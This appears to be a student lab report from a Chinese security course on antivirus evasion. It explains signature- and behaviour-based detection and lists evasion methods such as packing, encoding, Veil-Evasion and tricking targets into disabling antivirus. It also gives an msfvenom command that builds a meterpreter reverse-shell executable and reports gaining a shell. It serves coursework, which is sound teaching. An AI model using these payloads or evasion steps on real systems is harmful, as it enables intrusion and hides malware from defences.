20145334赵文豪《网络对抗》——免杀原理与实践

基础问题回答
（1）杀软是如何检测出恶意代码的？

基于特征码：通过特定数据来识别病毒，通常修改一处就可以免杀。特征码的查找方法:文件中的特征码被我们填入的数据（比如0）替换了，那杀毒软件就不会报警，以此确定特征码的位置。
基于行为：典型的行为如连接恶意网站、开放端口、修改系统文件，典型的“外观”如文件本身签名、结构、厂商等信息等。

（2）免杀是做什么？

改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术

（3）免杀的基本方法有哪些？
技术分类
改变特征码

加壳：使用专业的加壳软件，掩盖特征码；

使用encode等进行编码，进行异或、+1、-1等类似操作改变特征码；

使用其他语言进行重写再编译，如veil-evasion。

改变攻击行为

反弹式连接能大大减少被阻止查杀的风险；

在正常应用软件中插入恶意代码；

将恶意代码加密，运行恶意代码后再解密进行恶意操作；

非常规方法

使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。

使用社工类攻击，诱骗目标关闭AV软件。

纯手工打造一个恶意软件

实验步骤
msfvenom直接生成meterpreter可执行文件

1、首先使用命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机ip PORT=监听端口号 -f exe > 20145334.exe
使用生成meterpreter可执行文件20145334.exe

用后门程序做查杀实验

再次做查杀实验

使用该编码器即使编码次数再多也不会起到实质性效果啊，但是被查杀数还是减少了

使用Veil-Evasion，Veil-Evasion生成可执行文件

•在终端输入指令veil-evasion打开软件
进入操作界面

把生成的后门程序放在网站上查杀，结果如图所示

C语言调用Shellcode

在kali下进入MSF打开监听进程

kali成功获取权限